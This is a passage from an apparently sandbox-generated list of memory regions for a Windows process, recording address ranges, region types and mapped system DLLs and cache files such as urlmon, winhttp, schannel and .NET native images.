end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2529 start_va = 0x800000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2530 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2531 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2532 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2533 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2534 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2535 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2536 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2537 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2538 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2539 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2540 start_va = 0x1b7c0000 end_va = 0x1bbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b7c0000" filename = "" Region: id = 2541 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2550 start_va = 0xe30000 end_va = 0xf0cfff monitored = 0 entry_point = 0xe8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2555 start_va = 0x1bbc0000 end_va = 0x1bfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bbc0000" filename = "" Region: id = 2556 start_va = 0x1bfc0000 end_va = 0x1c3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bfc0000" filename = "" Region: id = 2557 start_va = 0x1c3c0000 end_va = 0x1c7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c3c0000" filename = "" Region: id = 2558 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2559 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2560 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2561 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2562 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2567 start_va = 0x1c7c0000 end_va = 0x1cbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c7c0000" filename = "" Region: id = 2568 start_va = 0x810000 end_va = 0x813fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2569 start_va = 0x820000 end_va = 0x832fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 2570 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2571 start_va = 0x810000 end_va = 0x813fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2572 start_va = 0x890000 end_va = 0x8d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2573 start_va = 0x860000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2574 start_va = 0xe30000 end_va = 0xebdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2575 start_va = 0x870000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2576 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2577 start_va = 0x1cbc0000 end_va = 0x1cfbafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001cbc0000" filename = "" Region: id = 2578 start_va = 0x7ffb174f0000 end_va = 0x7ffb176a7fff monitored = 0 entry_point = 0x7ffb1755e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2579 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2580 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2581 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 2582 start_va = 0x1cfc0000 end_va = 0x1d3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001cfc0000" filename = "" Region: id = 6477 start_va = 0x1d3c0000 end_va = 0x1d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d3c0000" filename = "" Region: id = 6478 start_va = 0x900000 end_va = 0x903fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10246 start_va = 0x1d7c0000 end_va = 0x1dbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d7c0000" filename = "" Region: id = 13091 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 13092 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 13096 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 13098 start_va = 0x7ffb06980000 end_va = 0x7ffb07300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll") Region: id = 13099 start_va = 0x7ffb0e380000 end_va = 0x7ffb0e49ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll") Region: id = 13100 start_va = 0x7ffb060e0000 end_va = 0x7ffb06979fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll") Region: id = 13102 start_va = 0xa30000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 13106 start_va = 0x7ffb0e2c0000 end_va = 0x7ffb0e379fff monitored = 0 entry_point = 0x7ffb0e2c5d90 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 13107 start_va = 0x1dbc0000 end_va = 0x1dfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001dbc0000" filename = "" Region: id = 13108 start_va = 0x7ffb1e090000 end_va = 0x7ffb1e0b7fff monitored = 0 entry_point = 0x7ffb1e09c7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 13109 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 13110 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13114 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 13115 start_va = 0xa50000 end_va = 0xb2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 13116 start_va = 0x1dfc0000 end_va = 0x1e3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001dfc0000" filename = "" Region: id = 13118 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 13119 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 13120 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 13121 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13122 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 13123 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 13128 start_va = 0x1e3c0000 end_va = 0x1e7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001e3c0000" filename = "" Region: id = 13129 start_va = 0x920000 end_va = 0x920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 13130 start_va = 0x920000 end_va = 0x928fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 13131 start_va = 0x920000 end_va = 0x920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 13132 start_va = 0x920000 end_va = 0x928fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 13133 start_va = 0x920000 end_va = 0x920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 13134 start_va = 0x920000 end_va = 0x928fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 13135 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 13138 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 13149 start_va = 0xb30000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 13150 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 13151 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 13152 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 13153 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 13154 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 13155 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 13156 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 13163 start_va = 0x920000 end_va = 0x921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 13164 start_va = 0xc30000 end_va = 0xc31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 13165 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 13166 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 13167 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 13168 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 13169 start_va = 0x1e7c0000 end_va = 0x1ebbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001e7c0000" filename = "" Region: id = 13170 start_va = 0x7ffaa9e20000 end_va = 0x7ffaa9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e20000" filename = "" Region: id = 13200 start_va = 0xc30000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 13202 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13203 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13204 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13205 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13206 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13207 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13208 start_va = 0xd30000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 13209 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 13210 start_va = 0xd50000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 13211 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 13212 start_va = 0xd70000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 13213 start_va = 0xd80000 end_va = 0xd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 13214 start_va = 0xd90000 end_va = 0xdaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 13215 start_va = 0xdb0000 end_va = 0xdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 13216 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13217 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13218 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13219 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13220 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13221 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13222 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13223 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13224 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13225 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13226 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13227 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13228 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13229 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13230 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13231 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13232 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13233 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13234 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13235 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13236 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13237 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13238 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13239 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13240 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13241 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13242 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13243 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13244 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13245 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13246 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13247 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13248 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13249 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13250 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13251 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13252 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13253 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13254 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13255 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13256 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13257 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13258 start_va = 0xcd0000 end_va = 0xcdffff monitored 